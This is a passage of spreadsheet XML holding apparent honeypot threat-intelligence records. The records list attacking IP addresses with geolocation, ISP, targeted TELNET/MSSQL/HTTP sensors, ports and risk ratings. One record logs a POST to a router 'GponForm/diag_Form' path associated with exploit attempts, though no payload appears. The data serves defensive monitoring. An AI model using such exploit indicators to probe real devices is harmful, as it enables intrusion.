    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '118', 'Host': '127.0.0.1:80', 'User-Agent': 'Hello, World', 'method': 'POST', 'uri': '/GponForm/diag_Form?images/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b18a"/>
    <s v="None&amp;&amp;C-I_D&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2156"/>
    <x v="2156"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T06:33:16"/>
    <d v="2024-01-31T07:33:39"/>
    <d v="2025-04-12T06:33:16"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;43754"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Hanam-si"/>
    <s v="Hanam (Sangil-ro 10-gil)"/>
    <s v="1897007"/>
    <s v="NA"/>
    <s v="37.5506"/>
    <s v="127.174"/>
    <s v="45374"/>
    <s v="CCS"/>
    <s v="CCS"/>
    <s v="business"/>
    <s v="Shinbiro"/>
    <s v="1996-11-26"/>
    <s v="SEJONG"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d279:162d"/>
    <s v="None"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2157"/>
    <x v="2157"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T06:29:32"/>
    <d v="2025-04-12T06:13:41"/>
    <d v="2025-04-12T06:29:32"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:1b4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2158"/>
    <x v="2158"/>
    <s v="NA&amp;&amp;220-133-30-1.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-12T06:10:22"/>
    <d v="2024-12-16T17:34:55"/>
    <d v="2025-04-12T06:10:22"/>
    <n v="506"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23&amp;&amp;46355&amp;&amp;80&amp;&amp;9100&amp;&amp;NA&amp;&amp;37762&amp;&amp;33993&amp;&amp;34014"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:1e01"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2159"/>
    <x v="2159"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T06:07:22"/>
    <d v="2025-04-12T06:06:47"/>
    <d v="2025-04-12T06:07:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="18"/>
    <s v="Bushehr"/>
    <s v="NA"/>
    <s v="Deyr"/>
    <s v="136280"/>
    <s v="NA"/>
    <s v="27.8399"/>
    <s v="51.9378"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Telecommunication Company of Boushehr"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3b5:61a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2160"/>
    <x v="2160"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T05:55:02"/>
    <d v="2025-04-12T05:55:02"/>
    <d v="2025-04-12T05:55:02"/>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df:5d5a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2161"/>
    <x v="2161"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T05:47:22"/>
    <d v="2025-02-13T23:32:12"/>
    <d v="2025-04-12T05:47:22"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="GA"/>
    <s v="Georgia"/>
    <s v="Fulton"/>
    <s v="Atlanta"/>
    <s v="4180439"/>
    <s v="30302"/>
    <s v="33.7488"/>
    <s v="-84.3877"/>
    <s v="30036"/>
    <s v="Mediacom Communications Corp"/>
    <s v="Mediacom Communications Corp"/>
    <s v="business"/>
    <s v="Mediacom Communications Corp"/>
    <s v="2008-05-19"/>
    <s v="MEDIACOM-RESIDENTIAL-CUST"/>
    <s v="2012-02-24"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ad15:45f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2162"/>
    <x v="2162"/>
    <s v="124-143-95-84.rev.home.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-12T05:10:09"/>
    <d v="2025-03-08T22:36:54"/>
    <d v="2025-04-12T05:10:09"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Suginami"/>
    <s v="Suginami-ku"/>
    <s v="1851510"/>
    <s v="NA"/>
    <s v="35.7048"/>
    <s v="139.623"/>
    <s v="9824"/>
    <s v="JCOM Co., Ltd."/>
    <s v="JCOM Co., Ltd."/>
    <s v="business"/>
    <s v="Jupiter Telecommunication Co. Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c8f:5f54"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2163"/>
    <x v="2163"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T04:35:27"/>
    <d v="2025-04-12T04:35:27"/>
    <d v="2025-04-12T04:35:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="José Bonifácio"/>
    <s v="José Bonifácio"/>
    <s v="3459667"/>
    <s v="NA"/>
    <s v="-21.0528"/>
    <s v="-49.6883"/>
    <s v="262684"/>
    <s v="AS262684"/>
    <s v="Net New Ltda"/>
    <s v="corporate"/>
    <s v="Net New Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb5e:2795"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2164"/>
    <x v="2164"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T04:10:34"/>
    <d v="2025-04-11T19:23:13"/>
    <d v="2025-04-12T04:10:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Kuzhithurai"/>
    <s v="1265387"/>
    <s v="NA"/>
    <s v="8.31792"/>
    <s v="77.1919"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:f702"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2165"/>
    <x v="2165"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T03:23:22"/>
    <d v="2025-04-12T00:47:52"/>
    <d v="2025-04-12T03:23:22"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:f72d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2166"/>
    <x v="2166"/>
    <s v="r179-25-78-89.dialup.adsl.anteldata.net.uy"/>
    <x v="0"/>
    <d v="2025-04-12T03:15:20"/>
    <d v="2025-04-12T03:15:20"/>
    <d v="2025-04-12T03:15:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="MO"/>
    <s v="Montevideo Department"/>
    <s v="Municipio B"/>
    <s v="Montevideo"/>
    <s v="3441575"/>
    <s v="NA"/>
    <s v="-34.9033"/>
    <s v="-56.1882"/>
    <s v="6057"/>
    <s v="AS6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="corporate"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:b319:4e59"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2167"/>
    <x v="2167"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T03:11:56"/>
    <d v="2025-04-12T03:11:56"/>
    <d v="2025-04-12T03:11:56"/>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3:3c0e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2168"/>
    <x v="2168"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T03:08:45"/>
    <d v="2025-04-12T03:08:45"/>
    <d v="2025-04-12T03:08:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:fc13"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2169"/>
    <x v="2169"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T03:08:05"/>
    <d v="2025-04-12T03:08:05"/>
    <d v="2025-04-12T03:08:05"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:dc04"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2170"/>
    <x v="2170"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T02:58:33"/>
    <d v="2025-04-12T02:58:33"/>
    <d v="2025-04-12T02:58:33"/>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7:f2b1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2171"/>
    <x v="2171"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T02:28:55"/>
    <d v="2025-04-11T21:35:00"/>
    <d v="2025-04-12T02:28:55"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783b:bd94"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2172"/>
    <x v="2172"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T02:26:57"/>
    <d v="2025-04-12T02:26:57"/>
    <d v="2025-04-12T02:26:57"/>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3b5c:ae30"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2173"/>
    <x v="2173"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T02:26:23"/>
    <d v="2025-04-12T02:26:23"/>
    <d v="2025-04-12T02:26:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:3311"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2174"/>
    <x v="2174"/>
    <s v="NA&amp;&amp;109-170-168-129.xdsl.murphx.net"/>
    <x v="0"/>
    <d v="2025-04-12T02:22:55"/>
    <d v="2024-11-23T07:56:09"/>
    <d v="2025-04-12T02:22:55"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="80&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Hampshire"/>
    <s v="Eastleigh"/>
    <s v="2650396"/>
    <s v="SO50"/>
    <s v="50.9689"/>
    <s v="-1.35063"/>
    <s v="5413"/>
    <s v="Daisy Corporate Services Trading Ltd"/>
    <s v="Daisy Communications"/>
    <s v="residential"/>
    <s v="Daisy Wholesale Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_HTTP:{'Content-Length': '0', 'Host': '154.26.156.60:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
